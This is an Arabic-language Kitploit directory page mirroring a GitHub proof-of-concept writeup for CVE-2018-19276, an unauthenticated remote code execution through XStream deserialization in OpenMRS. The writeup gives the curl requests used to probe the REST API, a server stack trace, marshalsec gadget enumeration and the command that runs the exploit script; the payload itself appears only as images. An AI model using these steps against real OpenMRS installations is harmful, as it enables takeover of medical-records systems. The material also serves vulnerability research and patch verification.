Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-19276 — CVE-2018-19276 - OpenMRS إلغاء تسلسل الكائنات غير الآمن - تنفيذ التعليمات البرمجية عن بُعد (RCE) | Kitploit
أدوات/GitHubGitHub/mpgn/cve-2018-19276
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubmpgn/cve-2018-19276

CVE-2018-19276

CVE-2018-19276 - OpenMRS إلغاء تسلسل الكائنات غير الآمن - تنفيذ التعليمات البرمجية عن بُعد (RCE)

عرض المستودع
164منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-19276 إلغاء تسلسل الكائنات غير الآمن في OpenMRS (RCE)

من https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607

يسمح إلغاء تسلسل الكائنات غير الآمن بتنفيذ تعليمات برمجية عشوائية دون الحاجة إلى تسجيل الدخول. قيود IP على وحدة خدمات الويب لا تمنع هذا الهجوم.

image

  • جميع إصدارات OpenMRS Platform 2.1.x < 2.1.4
  • جميع إصدارات OpenMRS Platform 2.0.x < 2.0.8
  • جميع إصدارات OpenMRS Platform 1.12.x < 1.12.1
  • جميع إصدارات OpenMRS Reference Application 2.8.x < 2.8.1
  • جميع إصدارات OpenMRS Reference Application 2.7.x < 2.7.2
  • جميع إصدارات OpenMRS Reference Application 2.6.x < 2.6.2

اكتشفها نيكولاس سيرا، المحلل الأمني في Bishop Fox.

إثبات المفهوم

لنتحقق من كيفية عمل خدمات الويب REST في OpenMRS باستخدام التوثيق الرسمي:

root@kitploit:~
curl -u admin:test -i 'http://localhost:8080/openmrs/ws/rest/v1/concept'

لنتحقق من الإصلاح:

  • https://github.com/openmrs/openmrs-module-webservices.rest/pull/369
  • https://github.com/openmrs/openmrs-module-webservices.rest/pull/372

يمكننا العثور على هذه المعلومات:

image https://github.com/openmrs/openmrs-module-webservices.rest/pull/369#issuecomment-443513473

إنهم يقومون أساسًا بتصفية Content-type لطلب POST عندما يكون XML، لذا ربما تكون XXE أو إلغاء تسلسل غير آمن 👍

لنعد التحقق من التوثيق مرة أخرى:

image

حسنًا، هذا رائع، ماذا يحدث إذا أرسلنا XML إلى خدمة الويب REST؟

root@kitploit:~
> curl -i -s -k  -X $'POST' -H $'Host: 127.0.0.1:8888' -H $'Content-Type: text/xml'  $'http://127.0.0.1:8888/openmrs/ws/rest/v1/concept'

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A896A8B1B0092400DBF74E2E8C365949; Path=/openmrs; HttpOnly
Content-Type: application/json;charset=UTF-8
Content-Length: 8980
Date: Mon, 11 Mar 2019 12:58:30 GMT
Connection: close

{"error":{"message":"[ : input contained no data]","code":"com.thoughtworks.xstream.io.xml.XppReader:126","detail":"com.thoughtworks.xstream.io.StreamException:  : input contained no data\n\tat com.thoughtworks.xstream.io.xml.XppReader.pullNextEvent(XppReader.java:126)\n\tat com.thoughtworks.xstream.io.xml.AbstractPullReader.readRealEvent(AbstractPullReader.java:148)\n\tat com.thoughtworks.xstream.io.xml.AbstractPullReader.readEvent(AbstractPullReader.java:141)\n\tat com.thoughtworks.xstream.io.xml.AbstractPullReader.move(AbstractPullReader.java:118)\n\tat com.thoughtworks.xstream.io.xml.AbstractPullReader.moveDown[...]

يُظهر الخطأ شيئًا مثيرًا للاهتمام للغاية: xstream.XStreamMarshaller

لنجرب استخدام الأداة الرائعة marshalsec لإحداث RCE باستخدام إلغاء تسلسل Java.

لنتحقق من الـ gadget المتاحة:

root@kitploit:~
$ java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream -v 
No gadget type specified, available are [SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin, CommonsConfiguration, LazySearchEnumeration, BindingEnumeration, ServiceLoader, ImageIO, CommonsBeanutils]

في هذه المرحلة، استخدمت البحث في GitHub على كل gadget من XStream للعثور على أي تواجد. فقط gadget ImageIO يبدو واعدًا:

image

لنجربها:

image

هذا هو!

الاستغلال

root@kitploit:~
python CVE-2018-19276.py

image

الموارد:

  • https://issues.openmrs.org/browse/RESTWS-742
  • https://www.bishopfox.com/news/2019/02/openmrs-insecure-object-deserialization/
  • https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607
  • https://wiki.openmrs.org/display/docs/REST+Web+Services+API+For+Clients#RESTWebServicesAPIForClients-SampleRESTcalls
تنزيل الأداة